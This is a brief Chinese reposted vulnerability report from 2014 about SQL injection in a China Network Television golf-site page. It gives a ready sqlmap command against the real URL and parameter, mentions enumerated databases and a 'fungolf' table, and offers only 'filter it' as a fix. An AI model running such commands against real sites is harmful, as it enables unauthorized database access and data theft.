中国网络电视台SQL注入漏洞下载

来源:黑吧安全网 浏览:1739次 时间:2014-04-28
做网站找雨过天晴工作室

中国网络电视台SQL注入漏洞中国网络电视台SQL注射漏洞

用sqlmap跑了一下,其他啥也没做。



sqlmap -u "http://golf.cctv.com/function/2013gold_court/courtlist.php?area=q" --dbs



看图:

继续:

fungolf表:

修复方案:

过滤一下。